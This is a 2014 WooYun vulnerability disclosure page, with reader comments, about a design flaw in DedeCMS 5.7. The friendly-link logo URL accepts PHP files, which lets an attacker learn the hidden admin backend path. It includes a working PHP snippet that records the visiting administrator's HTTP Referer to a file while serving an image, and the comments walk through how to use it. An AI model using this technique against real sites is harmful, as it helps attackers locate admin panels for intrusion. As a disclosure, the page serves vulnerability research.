当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-076556

漏洞标题:织梦某处设计缺陷导致后台地址泄露

相关厂商:Dedecms

漏洞作者: MuZhU0

提交时间:2014-09-19 14:26

修复时间:2014-12-15 14:28

公开时间:2014-12-15 14:28

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-19: 细节已通知厂商并且等待厂商处理中
2014-09-24: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-11-18: 细节向核心白帽子及相关领域专家公开
2014-11-28: 细节向普通白帽子公开
2014-12-08: 细节向实习白帽子公开
2014-12-15: 细节向公众公开

简要描述:

某处设计缺陷,程序对某些东西过滤不严,导致后台地址泄露,仅测试了5.7。目测其它版本同样存在问题。

详细说明:

QQ截图20140918214426.png


DEDECMS对友情链接申请的LOGO地址没有进行严格的判断和过滤,导致可以提交PHP、ASP等后缀。
且后台查看友情链接时,如下图所示,图片仍是申请时提交的URL。

QQ截图20140918214426.png


X.PHP 代码:
<?php
file_put_contents('x.txt',$_SERVER['HTTP_REFERER']);
header("Content-type:image/jpeg");
$img=imagecreatefromjpeg("x.jpg");
imagejpeg($img);
imagedestroy($img);
?>
当访问该文件,获取$_SERVER['HTTP_REFERER'],并且写出文件到X.TXT。

QQ截图20140918214426.png

漏洞证明:

QQ截图20140918214426.png


X.PHP 代码:
<?php
file_put_contents('x.txt',$_SERVER['HTTP_REFERER']);
header("Content-type:image/jpeg");
$img=imagecreatefromjpeg("x.jpg");
imagejpeg($img);
imagedestroy($img);
?>
当访问该文件,获取$_SERVER['HTTP_REFERER'],并且写出文件到X.TXT。

QQ截图20140918214426.png

修复方案:

应该都明白的,我就不献丑了。

版权声明:转载请注明来源 MuZhU0@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-12-15 14:28

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2014-09-19 14:27 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    刘明~!

  2. 2014-09-19 14:38 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )

    这个好!

  3. 2014-09-19 15:15 | 赈早见琥珀主 ( 实习白帽子 | Rank:33 漏洞数:5 )

    目测要火

  4. 2014-09-19 15:21 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    最需要的就是这个玩意了!

  5. 2014-09-19 15:30 | Safe ( 路人 | Rank:0 漏洞数:1 | 一个平凡的人)

    有这个BUG,妈妈再也不用担心你找不到后台了

  6. 2014-09-19 15:31 | 铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)

    我去,这个威力略大

  7. 2014-09-19 15:56 | Walle ( 路人 | Rank:0 漏洞数:5 | ... 位卑、未敢忘忧国! ...)

    哈哈!!!!!

  8. 2014-09-19 16:15 | Grayon ( 路人 | Rank:4 漏洞数:4 | 今天怎么不开心 :‮)

    我喜欢这个

  9. 2014-09-20 07:49 | bey0nd ( 普通白帽子 | Rank:895 漏洞数:142 | 相忘于江湖,不如相濡以沫)

    卧槽

  10. 2014-09-22 10:22 | menmen519 ( 普通白帽子 | Rank:762 漏洞数:146 | http://menmen519.blog.sohu.com/)

    这个给力,一直是个头痛的问题

  11. 2014-09-23 20:18 | Azui ( 路人 | Rank:25 漏洞数:10 | 用一只黑色铅笔画一出舞台默剧。)

    这个比较屌

  12. 2014-09-25 10:50 | 微尘 ( 普通白帽子 | Rank:218 漏洞数:74 )

    为毛还不公开

  13. 2014-09-25 10:50 | 微尘 ( 普通白帽子 | Rank:218 漏洞数:74 )

    @MuZhU0 直接漏点吧,不用怕我们会LJ你的。放心我们都不是什么好人

  14. 2014-09-25 17:54 | MuZhU0 ( 路人 | Rank:6 漏洞数:4 )

    @微尘 哈哈哈,这个东西其实非常鸡肋。

  15. 2014-09-26 09:01 | 发条橙子 ( 路人 | Rank:19 漏洞数:6 | ∑(っ °Д °;)っ)

    别是日志就行。。

  16. 2014-09-26 14:04 | emeditor ( 路人 | Rank:2 漏洞数:1 | 过来乌云学习 求大神别黑)

    这个必须能火…

  17. 2014-09-26 20:59 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天,我会骑着雨牛@'雨。踩着一哥@jan...)

    哈哈 幸亏厂商无良...

  18. 2014-09-26 22:09 | 风情万种 ( 普通白帽子 | Rank:181 漏洞数:63 | 不再相信爱了)

    我喜欢!

  19. 2014-09-27 10:56 | lck丶 ( 路人 | Rank:6 漏洞数:2 | 求大牛拿0day砸死)

    卧槽

  20. 2014-09-27 14:33 | 微尘 ( 普通白帽子 | Rank:218 漏洞数:74 )

    @MuZhU0 不是那个日志吧?求漏电有木有

  21. 2014-09-27 18:09 | MuZhU0 ( 路人 | Rank:6 漏洞数:4 )

    @微尘 既然忽略了,就说了吧。友情链接申请哪里可以提交PHP文件,管理员后台看友情链接申请的时候,PHP获取来源页就行了。

  22. 2014-09-27 18:16 | 风情万种 ( 普通白帽子 | Rank:181 漏洞数:63 | 不再相信爱了)

    @MuZhU0 这样子的哇!有点鸡肋啊

  23. 2014-09-27 20:45 | MuZhU0 ( 路人 | Rank:6 漏洞数:4 )

    @风情万种 是哇,鸡肋。

  24. 2014-09-27 20:50 | Azui ( 路人 | Rank:25 漏洞数:10 | 用一只黑色铅笔画一出舞台默剧。)

    @MuZhU0 我记得之前就有人发过 通过流量统计那边查看管理员访问的链接,原理一样,鸡肋- -。

  25. 2014-10-02 21:21 | 铁汉 ( 路人 | Rank:12 漏洞数:6 | 向各种大神学习之)

    必须会火,求关注

  26. 2014-10-11 14:37 | D&G ( 普通白帽子 | Rank:523 漏洞数:103 | going)

    需要交互嘛~~

  27. 2014-10-11 15:57 | 0x334 ( 普通白帽子 | Rank:171 漏洞数:35 | 漏洞无影响,已忽略~~~~~~~)

    利用确实有点鸡肋

  28. 2014-10-13 14:32 | shack2 ( 普通白帽子 | Rank:470 漏洞数:71 | QQ:1341413415 一个热爱编程(Java),热爱网...)

    referer一直是个让人不省心的的东西啊

  29. 2014-10-14 11:25 | chowner ( 路人 | Rank:4 漏洞数:2 | 运维工程师 兼职搞安全)

    referer,难怪被忽略,还需要交互。。

  30. 2014-12-15 14:37 | 老黑 ( 普通白帽子 | Rank:161 漏洞数:61 | 最爱红颜不老。)

    图片也可以查看REFFER啊 为什么一定要ASP PHP呢

  31. 2014-12-15 17:46 | MuZhU0 ( 路人 | Rank:6 漏洞数:4 )

    @老黑 PHP写出文件不是更方便嘛。

  32. 2014-12-24 17:47 | Mxx ( 路人 | Rank:0 漏洞数:2 | 没有)

    x.txt ? 本地 还是 目标站?

  33. 2014-12-25 08:58 | 带我玩 ( 路人 | Rank:12 漏洞数:6 | 带我玩)

    x.txt 是写入到根目录还是哪里...楼主

  34. 2015-01-17 10:22 | Sofia ( 路人 | Rank:25 漏洞数:6 | 不会渗透的SEOer不是好站长)

    @带我玩 是自己本地的,试下就知道了

  35. 2015-01-17 10:22 | Sofia ( 路人 | Rank:25 漏洞数:6 | 不会渗透的SEOer不是好站长)

    @Mxx 是自己本地的,试下就知道了

  36. 2015-01-18 15:34 | Mxx ( 路人 | Rank:0 漏洞数:2 | 没有)

    @Sofia 测试跳转到后台?

  37. 2015-01-18 16:11 | Sofia ( 路人 | Rank:25 漏洞数:6 | 不会渗透的SEOer不是好站长)

    @Mxx 这个很简单啊,就是远程链接一个自己服务器的php文件,管理访问后台那个地方的时候就会加载这个php,然后自己这个php文件同目录会生成x.txt文件,里面记录了referer,就是后台路径

  38. 2015-01-19 14:36 | Mxx ( 路人 | Rank:0 漏洞数:2 | 没有)

    @Sofia 我懂了,谢了。

  39. 2015-01-22 15:24 | xsjswt ( 普通白帽子 | Rank:156 漏洞数:49 | 我思故我猥琐,我猥琐故我强大)

    这个没用啊,就算后缀是图片的,服务器是我控制的,依然可以抓到referer

  40. 2015-08-05 23:07 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)

    这个没用啊,就算后缀是图片的,服务器是我控制的,依然可以抓到referer

  41. 2015-08-24 14:57 | 鬼五 ( 普通白帽子 | Rank:214 漏洞数:83 )

    大爱